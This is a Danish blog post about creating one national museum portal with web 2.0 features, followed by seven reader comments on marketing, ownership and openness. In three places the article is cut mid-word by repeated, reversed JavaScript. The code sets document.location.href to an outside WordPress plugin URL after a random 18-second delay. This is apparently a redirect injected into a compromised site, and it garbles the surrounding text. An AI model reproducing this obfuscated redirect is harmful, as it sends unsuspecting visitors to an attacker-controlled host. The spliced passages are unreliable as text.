metamuseum.dk

Logo for GNU/Linux - free software
Danmark har det (borger.dk). Bibliotekerne har det (bibliotek.dk). København har det (mitkbh.dk). Eksemplerne er mange og de nævnte er kun få. Verden tilhører metatjenesterne, som en kollega fra dette forum forleden kommenterede. I hvert fald den digitale del af den. Men skal museerne også?

Skal Danmark have en samlet museumsportal hvor alle museer er repræsenterede ved en samlet indgang? Skal Norden, Europa? Skal verden?

Regionale portaler og samarbejde om hjemmesider er på plads flere steder. F. eks. har museerne og arkiver i det tidligere Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torstrøms Amt i en længere årrække samarbejdet om bl.a. institutionernes præsentation på nettet (læs mere om åbne samlinger her) Et andet eksempel på en regional museumsportal – i dette tilfælde dog primært tænkt i markedsføringsøjemed – er Museer i København og Omegn, www.mik.dk. Desuden har også mere projektbaserede samarbejder fundet sted som f. eks. www.kulturrejsen.dk, som var/er et samarbejde mellem 22 kulturhistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriske- og kunstmuseer i Nordjylland.

…og hvad skete der nogensinde med Danske Museer Online (www.dmol.dk)? Endnu et eksempel på en god idé begravet i størst mulig stilhed på projektkirkegården?

Til forskel fra eksemplerne nævnt i første afsnit herover skorter det med interaktionsmuligheder i eksemplerne i det andet afsnit – og til en vis grad også med anvendeligheden. Der mangler kort sagt det vi efterhånden har lært at kalde web 2.0 elementer. Kunne man forestille sig et dmol 2.0? Eller er det Regin der skal stå som det samlende element på tværs af de institutioner der ikke kører sololøb i den sammenhæng?

Ville en samlet museumsportal i stil med et netværkssite hvor det enkelte museum har vide muligheder for at skabe sit eget rum, udvidet med forskellige moduler osv. modarbejde det enkelte museums brand og profilering? Hvis man forestiller sig et site med fuld skrue på web 2.0 elementer – blogs, brugerkommentarer, afstemninger, mashups med netværkstjenester og meget andet samlet i en stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor sammenkoblet portal med links, søgninger, tags m.m. der binder alle de enkelte institutioner sammen i en helhed… Open Source museer med fri adgang til ressourcer under f. eks. et Creative Commons princip?

Det bliver naturligvis lynhurtigt til et politisk spørgsmål; hvem må være med, hvem må ikke? Bliver der ikke en regional skævvridning? hvem skal betale? Og skal man mon være medlem af ODM? osv. Men som tankeeksperiment er det interessant… diskussionen kunne også blive det! Kort sagt – ville (museums)verden mon ikke blive et bedre sted hvis vi (museerne og mennesker i almindelighed) var lidt bedre til at løfte i samlet flok og tænke – bare lidt – større?

7 comments to “metamuseum.dk”
 1. Problemet med fælles museal markedsføring er at kundegrupperne er for fragmenterede.
  At markedsføre et bondegårdsmuseum sammen med et søfarts eller egnsmuseum giver lige så god mening som at markedsføre ris i kogeposer og legoklodser sammen.
  Benchmark blot op imod de mange turistorganisationer der i rigtig mange sammenhænge lider fordi der ikke er fælles fodslag trods viljen.

  http://sorenholmberg.wordpress.com/2007/11/05/misk-mask/

 2. Meget spændende indlæg og interessant diskussion. Som jeg har forstået dit indlæg, Rune, er det ikke en specifik markedsføringsportal, du mener, men en portal, hvor vi alle både museernes brugere, ikke-brugere og museumsfolk kan få et indblik i museernes verden og musealt arbejde og bidrage med synspunkter og erfaringer etc. Det kunne være interessant at diskutere i formidlingsnetværket på formidlingsseminariet.

 3. Jeg er personligt meget enig med Søren og Rune. Dét, der giver mening administrativt, behøver langtfra at være relevant for brugerne ifht. formidling og markedsføring.

  En anden ting som jeg personligt opfatter som vigtig er, at der ikke er nogen (eller meget få) der interesserer sig for museer. Eller for arkiver, biblioteker og andre kulturarvsinstitutioner for den sags skyld. Det kommer man tit til at glemme i hverdagen, fordi man som institution har en naturlig synsvinkel, som retter sig mod XX-museum. Men jeg oplever, at folk interesserer sig for et emne – ikke for en institution. Den er sekundær i forhold den passion man som menneske nærer for toghistorie, slægtsforskning, vikingetiden eller blomstermaleri på bondemøbler.

  Så den site, som Rune skitserer er jeg stensikker på ville have gang på jorden. Ikke mindst, hvis der var mulighed for at brugerne kunne kommentere og tagge genstandene, trække billeder af genstande til deres egen “profil”, evt. selv uploade fotos, filmstumper, erindringer etc. og gå i dialog med såvel andre brugere som med historiefaglige personer på institutionerne. (Jeg er klar over at ophavsret, ressourceforbrug og andet ikke ville være nemt at udrede – men som tankeeksperiment….)

  Jeg tror derfor også at én af grundene til succesen for et lille projekt som historie-online netop er, at her tager vi udgangspunkt i interessen for historie, ikke i en bestemt institution, region eller institutionstype, og vi har jo pænt med besøgende.

  Jeg synes også at et af de ord som Rune har brug som tag er meget sigende, nemlig “Frihed”. Tankeeksperimentet handler jo også om at skabe en fri adgang til kilderne og en frihed til at bruge dem i sin egen kontekst. Netop spørgsmålet om, hvem der kontekstualiserer genstande m.m. er meget interessant i denne sammenhæng. Mikkel, Mette og undertegnede har begået en lille artikel i Noter om dette emne og artiklen “Historieformidling i en elektronisk tidsalder ligger i pdf på min egen blog (hvis noget skulle have lyst at læse den). Det kunne være spændende at skrive noget til Danske Museer om dette emne, og v i har jo allerede titlen – metamuseum.dk 😉 Jeg vil gerne vær emed i en skrivegruppe, hvis andre også vil.

 4. Som en flittig bruger af Bibliotek.dk kunne jeg ønske det samme for museerne. Men jeg kender alt for godt betingelserne i vores verden. Og DMOL var kun en af de centralt styrede fejlslagne projekter (ikke kun navnet er i mol). DMI var i mange år det store mantra, som man ikke skulle være imod, for ellers var man en kværulantisk ignorant. I dag kan vi se, at det var en kollosal IT skandale, som heldigvis ingen formiddagsblade fik øjnene på. Og der findes mange ‘spøgelseslandsbyer’ på nettet i nærheden af museumsverdenen, som indbyggerne har forladt, da fondsmidlerne slap op, og som nu ligger sandblæste mens de ældes.
  Imidlertid er Bibliotek.dk et helt specielt projekt. Det bliver ikke drevet af en statsinstitution, men af et aktieselskab, som sikrer kontinuitet og professionalisme. Samtidig bygger det på et syndikat af bidragsydere, de enkelte forskningsbiblioteker – og jeg vil gerne bekende mig som tilhænger af syndikalisme. Efter de seneste dage at have besøgt samtlige danske museers hjemmesider er jeg forbløffet over den idérigdom, der findes og som kan ses på trods af de desværre også synlige meget sparsomme midler til programmører.
  Vi bør pulje vores gode ting, men lade tingene være organiseret således, at en kommunalreform eller regeringsskifte med en ny kulturministers fikse idéer ikke ødelægger det opbyggede.
  Det er dog ikke noget, som kommer af sig selv. Vi får nemlig snart en hård konkurrent http://www.videnskab.dk som med store millionbeløb skal formidle i populær form. Experimentariet og DR videnskabsredaktionen har sat sig til rette i redaktionslokalerne og jeg tvivler på at der er en stol til en museums-m/k.

 5. Jeg tror der er en grundig organisatorisk overvejelse at gøre sig. Som Rune skriver: hvem skal eje, drive, få indflydelse. Museerne i DK er en ret decentral kultur. Men det er en helt rigtig vision – måske var det et af de første punkter vi skulle have på vores kommende manifest…

 6. Det kunne godt være “noget” til manifestet og forankringen er vigtig. Hvis vi stadig er i tankeeksperimentets verden kunne kuas, KUM – og en selvstændig web-, formidlings- og historiefaglig styregruppe jo være én af de muligheder man tænkte i.

  Men noget af dét som man også måtte overveje er jo, hvem man screener af gennem sine organisatoriske valg. Fx er alle lokal- og stadsarkivernes rige samlinger af arkivalier, billeder, film m.m. jo ikke med, fordi de ikke er kum/kuas-institutioner. Og jeg synes, at “museer” er for snæver en størrelse, hvis man virkelig skulle tænke i det store vingefang, sådan som Rune gør.

 7. Det er dejligt at se de gode kommentarer – og det tyder på at det er noget vi børe tage op i anden sammenhæng…

  Mht. markedsføring er jeg ikke enig i at problemet behøver at være stort. Det lykkes f. eks. udmærket for Føtex/Bilka at markedsføre ris i kogeposer, hygiejnebind og legoklodser sammen 😉 I øvrigt har folk med øjne for markedsføringspotentiale ikke været sene til at kolonisere de forskellige digitale sociale netværk som f. eks. myspace og facebook.

  Måske kan det i udgangspunktet være konraproduktivt at tænke i institutionel forankring, politik og økonomi – men det er muligvis et nødvendigt onde.

  Jeg ser det mere som en vision om et socialt netværk af kultur- og naturhistoriske/kunstfaglige, arkivalske, lokalhistoriske osv. osv. institutioner og individer på tværs og aldeles frit!

  Det ville desuden kunne opnås ad flere veje. En af de mere usexy aspekter af web 2.0 er jo også de mere højpandede spørgsmål om åbne standarder og semantisk web – hvis de (i en utopisk fremtid) skulle effektueres kunne data hentes og præsenteres frit i forskellige formater helt afhængigt af brugerens eller brugergruppers ønsker…

  Og vi kan – og bør – naturligvis diskutere hvilken betydning den åbenhed får for vores vidensmonopol, status osv. Men imens vi diskuterer sker tingene om ørene på os – while we are busy making other plans, som John Lennon ville sige – uanset om vi kan acceptere ekspertens frie fald fra elfenbenstårnet eller ej…

  Der er naturligvis en god portion ideologi i det her – en grundlæggende ide om at data og viden bør kunne spredes og udvikles frit med maksimal åbnhed. Det kan være et skræmmende perspektiv! …og måske er det en bevægelse der skal komme nedefra i bedste revolutionære stil 😉

  ‘Peace’ og god weekend!

Skriv et svar